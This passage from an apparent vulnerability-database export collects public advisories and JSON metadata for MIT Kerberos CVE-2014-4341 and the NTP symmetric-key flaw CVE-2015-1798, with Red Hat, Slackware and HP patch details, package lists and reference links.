7):\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nppc64:\nkrb5-debuginfo-1.12.2-14.el7.ppc.rpm\nkrb5-debuginfo-1.12.2-14.el7.ppc64.rpm\nkrb5-devel-1.12.2-14.el7.ppc.rpm\nkrb5-devel-1.12.2-14.el7.ppc64.rpm\nkrb5-libs-1.12.2-14.el7.ppc.rpm\nkrb5-libs-1.12.2-14.el7.ppc64.rpm\nkrb5-pkinit-1.12.2-14.el7.ppc64.rpm\nkrb5-server-1.12.2-14.el7.ppc64.rpm\nkrb5-server-ldap-1.12.2-14.el7.ppc64.rpm\nkrb5-workstation-1.12.2-14.el7.ppc64.rpm\n\ns390x:\nkrb5-debuginfo-1.12.2-14.el7.s390.rpm\nkrb5-debuginfo-1.12.2-14.el7.s390x.rpm\nkrb5-devel-1.12.2-14.el7.s390.rpm\nkrb5-devel-1.12.2-14.el7.s390x.rpm\nkrb5-libs-1.12.2-14.el7.s390.rpm\nkrb5-libs-1.12.2-14.el7.s390x.rpm\nkrb5-pkinit-1.12.2-14.el7.s390x.rpm\nkrb5-server-1.12.2-14.el7.s390x.rpm\nkrb5-server-ldap-1.12.2-14.el7.s390x.rpm\nkrb5-workstation-1.12.2-14.el7.s390x.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkrb5-1.12.2-14.el7.src.rpm\n\nx86_64:\nkrb5-debuginfo-1.12.2-14.el7.i686.rpm\nkrb5-debuginfo-1.12.2-14.el7.x86_64.rpm\nkrb5-devel-1.12.2-14.el7.i686.rpm\nkrb5-devel-1.12.2-14.el7.x86_64.rpm\nkrb5-libs-1.12.2-14.el7.i686.rpm\nkrb5-libs-1.12.2-14.el7.x86_64.rpm\nkrb5-pkinit-1.12.2-14.el7.x86_64.rpm\nkrb5-server-1.12.2-14.el7.x86_64.rpm\nkrb5-server-ldap-1.12.2-14.el7.x86_64.rpm\nkrb5-workstation-1.12.2-14.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-4341\nhttps://access.redhat.com/security/cve/CVE-2014-4342\nhttps://access.redhat.com/security/cve/CVE-2014-4343\nhttps://access.redhat.com/security/cve/CVE-2014-4344\nhttps://access.redhat.com/security/cve/CVE-2014-4345\nhttps://access.redhat.com/security/cve/CVE-2014-5352\nhttps://access.redhat.com/security/cve/CVE-2014-5353\nhttps://access.redhat.com/security/cve/CVE-2014-9421\nhttps://access.redhat.com/security/cve/CVE-2014-9422\nhttps://access.redhat.com/security/cve/CVE-2014-9423\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFU+GoxXlSAg2UNWIIRAtkZAJ9PYyHLsR1t+YWgqw4jb4XTtX8iuACgkxfi\ngZD8EL2lSaLXnIQxca8zLTg=\n=aK0y\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. 6) - i386, x86_64\n\n3. \n\nIt was found that if a KDC served multiple realms, certain requests could\ncause the setup_server_realm() function to dereference a NULL pointer. (CVE-2014-4343)\n\nThese updated krb5 packages also include several bug fixes. Space precludes\ndocumenting all of these changes in this advisory. Users are directed to\nthe Red Hat Enterprise Linux 6.6 Technical Notes, linked to in the\nReferences section, for information on the most significant of these\nchanges", "sources": [ { "db": "NVD", "id": "CVE-2014-4341" }, { "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "db": "BID", "id": "68909" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "129774" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-4341", "trust": 3.4 }, { "db": "BID", "id": "68909", "trust": 1.9 }, { "db": "SECUNIA", "id": "59102", "trust": 1.6 }, { "db": "SECUNIA", "id": "60448", "trust": 1.6 }, { "db": "SECUNIA", "id": "60082", "trust": 1.6 }, { "db": "SECTRACK", "id": "1030706", "trust": 1.6 }, { "db": "JVNDB", "id": "JVNDB-2014-003508", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201407-512", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "127813", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "127825", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128077", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129774", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128267", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130669", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "128660", "trust": 0.1 } ], "sources": [ { "db": "BID", "id": "68909" }, { "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "129774" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "NVD", "id": "CVE-2014-4341" }, { "db": "CNNVD", "id": "CNNVD-201407-512" } ] }, "id": "VAR-201407-0461", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2023-12-18T11:35:24.421000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "krb5/krb5", "trust": 0.8, "url": "https://github.com/krb5/krb5/commit/e6ae703ae597d798e310368d52b8f38ee11c6a73" }, { "title": "RHSA-2015:0439", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0439.html" }, { "title": "Ticket #7949 Handle invalid RFC 1964 tokens [CVE-2014-4341 CVE-2014-4342]", "trust": 0.8, "url": "http://krbdev.mit.edu/rt/ticket/display.html?id=7949" }, { "title": "Multiple Buffer Errors vulnerabilities in Kerberos", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_buffer_errors_vulnerabilities_in4" }, { "title": "src-lib-gssapi-krb5-k5unseal.c", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=50896" }, { "title": "src-lib-gssapi-krb5-k5unsealiov.c", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=50897" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "db": "CNNVD", "id": "CNNVD-201407-512" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-125", "trust": 1.0 }, { "problemtype": "CWE-119", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "db": "NVD", "id": "CVE-2014-4341" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.9, "url": "http://krbdev.mit.edu/rt/ticket/display.html?id=7949" }, { "trust": 1.9, "url": "http://aix.software.ibm.com/aix/efixes/security/nas_advisory1.asc" }, { "trust": 1.9, "url": "https://github.com/krb5/krb5/commit/e6ae703ae597d798e310368d52b8f38ee11c6a73" }, { "trust": 1.7, "url": "http://advisories.mageia.org/mgasa-2014-0345.html" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-201412-53.xml" }, { "trust": 1.7, "url": "http://rhn.redhat.com/errata/rhsa-2015-0439.html" }, { "trust": 1.6, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136360.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59102" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60082" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60448" }, { "trust": 1.6, "url": "http://www.debian.org/security/2014/dsa-3000" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:165" }, { "trust": 1.6, "url": "http://www.securityfocus.com/bid/68909" }, { "trust": 1.6, "url": "http://www.securitytracker.com/id/1030706" }, { "trust": 1.6, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94904" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4341" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4341" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4341" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4345" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4344" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4343" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4342" }, { "trust": 0.3, "url": "http://web.mit.edu/kerberos/" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101001206" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101004185" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020664" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15552.html?ref=rss" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1418" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6800" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-6800.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1418.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-4341.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-4344.html" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/krb5/1.8.1+dfsg-2ubuntu0.13" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/krb5/1.12+dfsg-2ubuntu4.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1416" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/krb5/1.10+dfsg~beta1-2ubuntu0.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1016" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1415" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2310-1" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4344" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4345" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4342" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4343" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-5351" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4345" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-4341" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5351" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-1245.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4342" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4343" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9421" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-5353" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9423" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4341" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5353" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9422" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9421" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4345" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9423" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5352" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-5352" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9422" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4344" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4345.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-1389.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4343.html" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.6_technical_notes/krb5.html#rhsa-2014-1389" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4342.html" } ], "sources": [ { "db": "BID", "id": "68909" }, { "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "129774" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "NVD", "id": "CVE-2014-4341" }, { "db": "CNNVD", "id": "CNNVD-201407-512" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "BID", "id": "68909" }, { "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "129774" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "NVD", "id": "CVE-2014-4341" }, { "db": "CNNVD", "id": "CNNVD-201407-512" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-06-26T00:00:00", "db": "BID", "id": "68909" }, { "date": "2014-07-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "date": "2014-08-11T13:33:00", "db": "PACKETSTORM", "id": "127813" }, { "date": "2014-08-11T18:24:00", "db": "PACKETSTORM", "id": "127825" }, { "date": "2014-09-02T20:17:38", "db": "PACKETSTORM", "id": "128077" }, { "date": "2014-12-31T12:12:00", "db": "PACKETSTORM", "id": "129774" }, { "date": "2014-09-16T14:08:26", "db": "PACKETSTORM", "id": "128267" }, { "date": "2015-03-05T21:51:51", "db": "PACKETSTORM", "id": "130669" }, { "date": "2014-10-14T23:04:48", "db": "PACKETSTORM", "id": "128660" }, { "date": "2014-07-20T11:12:50.823000", "db": "NVD", "id": "CVE-2014-4341" }, { "date": "2014-07-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-512" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-05-07T17:32:00", "db": "BID", "id": "68909" }, { "date": "2015-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003508" }, { "date": "2021-02-02T19:00:48.647000", "db": "NVD", "id": "CVE-2014-4341" }, { "date": "2021-02-03T00:00:00", "db": "CNNVD", "id": "CNNVD-201407-512" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "CNNVD", "id": "CNNVD-201407-512" } ], "trust": 1.1 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "MIT Kerberos 5 Service disruption in (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003508" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201407-512" } ], "trust": 0.6 } }
var-201504-0362
Vulnerability from variot
The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 3.x and 4.x before 4.2.8p2 performs state-variable updates upon receiving certain invalid packets, which makes it easier for man-in-the-middle attackers to cause a denial of service (synchronization loss) by spoofing the source IP address of a peer. NTP Project ntpd reference implementation accepts unauthenticated packets with symmetric key cryptography and does not protect symmetric associations against denial of service attacks. NTP of ntpd of ntp_proto.c Inside receive of symmetric-key The function is used even when a specific invalid packet is received. state variable Service operation disruption to perform update ( Sync failure ) There are vulnerabilities that are put into a state. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. http://cwe.mitre.org/data/definitions/17.htmlMan-in-the-middle attacks (man-in-the-middle attack) By the source of the peer IP Denial of service by spoofing addresses ( Sync failure ) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. Successful exploits may allow the attacker to cause a denial-of-service condition.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz: Upgraded. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p2-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p2-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p2-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p2-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p2-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p2-i486-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p2-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 570bb3e4bb7b065101fa4963e757d7e7 ntp-4.2.8p2-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: e6add42a70a66496be2d4978370c2799 ntp-4.2.8p2-x86_64-1_slack13.0.txz
Slackware 13.1 package: 99f1cfa5e23a256d840ed0a56b7f9400 ntp-4.2.8p2-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: 0a6622196521e084d36cda13fc6da824 ntp-4.2.8p2-x86_64-1_slack13.1.txz
Slackware 13.37 package: 28cfe042c585cf036582ce5f0c2daadf ntp-4.2.8p2-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: c436da55cd2d113142410a9d982c5ac5 ntp-4.2.8p2-x86_64-1_slack13.37.txz
Slackware 14.0 package: cf69f8ecb5e4c1902dfb22d0f9685278 ntp-4.2.8p2-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: 9c8344ec56d5d2335fd7370e2f9cf639 ntp-4.2.8p2-x86_64-1_slack14.0.txz
Slackware 14.1 package: 9dcf0eafa851ad018f8341c2fb9307b5 ntp-4.2.8p2-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: e0c063f4e46a72ec86012a46299a46df ntp-4.2.8p2-x86_64-1_slack14.1.txz
Slackware -current package: 5f72de16e3bb6cd216e7694a49671cee n/ntp-4.2.8p2-i486-1.txz
Slackware x86_64 -current package: 1ba531770e4a2ae6e8e7116aaa26523e n/ntp-4.2.8p2-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p2-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address.
Release Date: 2015-05-19 Last Updated: 2015-05-19
Potential Security Impact: Remote Denial of Service (DoS), or other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running NTP. These could be exploited remotely to create a Denial of Service (DoS), or other vulnerabilities.
References:
CVE-2015-1798 - Symmetric-Key feature allows MAC address spoofing (CWE-17) CVE-2015-1799 - Symmetric-Key feature allows denial of service (CWE-17) SSRT102029 CERT-VU#852879
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.31 running NTP v4.x, specifically version C.4.2.6.5.0 or previous
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-1798 (AV:A/AC:H/Au:N/C:N/I:P/A:N) 1.8 CVE-2015-1799 (AV:A/AC:M/Au:N/C:N/I:P/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following solution for HP-UX B.11.31.
A new B.11.31 depot for HP-UX-NTP_C.4.2.6.6.0 is available here:
https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =HPUX-NTP
Reference: http://support.ntp.org/bin/view/Main/SecurityNotice
MANUAL ACTIONS: Yes - Update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.31
NTP.INETSVCS2-BOOT NTP.NTP-AUX NTP.NTP-RUN action: install revision C.4.2.6.6.0 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 19 May 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Comware 7 (CW7) Products - all versions prior to the fixed versions in the Resolution section below.
-
12500 (Comware 7) - Version: Fix in R7375
- HP Network Products
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- JC072B HP 12500 Main Processing Unit
- JG497A HP 12500 MPU w/Comware V7 OS
- JG782A HP FF 12508E AC Switch Chassis
- JG783A HP FF 12508E DC Switch Chassis
- JG784A HP FF 12518E AC Switch Chassis
- JG785A HP FF 12518E DC Switch Chassis
- JG802A HP FF 12500E MPU
- JG803A HP FlexFabric 12500E TAA-compliant Main Processing Unit
-
10500 (Comware 7) - Version: Fix in R7169P01
- HP Network Products
- JC611A HP 10508-V Switch Chassis
